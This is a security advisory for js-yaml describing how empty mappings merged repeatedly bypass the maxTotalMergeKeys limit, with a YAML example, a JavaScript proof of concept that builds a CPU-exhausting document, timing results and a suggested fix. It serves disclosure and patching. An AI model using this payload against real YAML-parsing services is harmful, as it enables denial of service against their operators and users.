mediumCVSS 5.3Vulnerability

GHSA-r3ph-w7gj-g6xm

## Summary `maxTotalMergeKeys` does not count empty mappings. An attacker can repeatedly merge a large sequence of them and consume significant CPU without reaching the configured limit. ## Example ```yaml arr: &arr [{}, {}, {}, ...] # N empty mappings targets: - <<: *arr # repeated K times ``` For every target, the loader iterates all `N` elements of `arr`. This results in `O(N * K)` work while `totalMergeKeys` remains unchanged. ## PoC ```js import { performance } from 'node:perf_hooks' import { load, YAML11_SCHEMA } from 'js-yaml' const n = 20000 const src = 'arr: &arr [' + '{},'.repeat(n).slice(0, -1) + ']\n' + 'targets:\n' + ' - <<: *arr\n'.repeat(n) const started = performance.now() load(src, { schema: YAML11_SCHEMA }) console.log(`${(performance.now() - started).toFixed(1)} ms`) ``` Observed results: | N | YAML size | Time | |---:|---:|---:| | 800 | ~13 KB | ~20 ms | | 3200 | ~50 KB | ~180 ms | | 20000 | ~500 KB | ~13 s | ## Impact When merge keys are enabled, an attacker can submit a relatively small YAML document that causes prolonged CPU consumption despite the default `maxTotalMergeKeys` limit. ## Fix Count every merge source mapping as one budget unit in addition to counting its keys.

Properties

severity
medium
summary
js-yaml: maxTotalMergeKeys does not limit CPU use for empty merge sources
cvss_score
5.3
retrieved_at
2026-09-29T18:18:48+00:00
ghsa_published
2026-09-29T17:57:39Z
source_url
https://github.com/advisories/GHSA-r3ph-w7gj-g6xm
ghsa_updated
2026-09-29T17:57:40Z
ghsa_id
GHSA-r3ph-w7gj-g6xm
last_source
GitHub Advisory Database
cve_id
GHSA-r3ph-w7gj-g6xm
cvss_vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
signal_observed_at
2026-09-29T18:10:48+00:00
is_ghsa_only
true

Related Entities (5)

VULNERABLE_TO (1)

←[Software]npm/js-yaml

AFFECTS (1)

→[Software]npm/js-yaml

HAS_WEAKNESS (2)

→[Weakness]Inefficient Algorithmic Complexity
→[Weakness]Uncontrolled Resource Consumption

REPORTED_BY (1)

→[Source]GitHub Advisory Database

Explore deeper with Ninja Signal's threat intelligence graph

GHSA-r3ph-w7gj-g6xm (CVSS 5.3) — Ninja Signal Threat Intelligence | Ninja Signal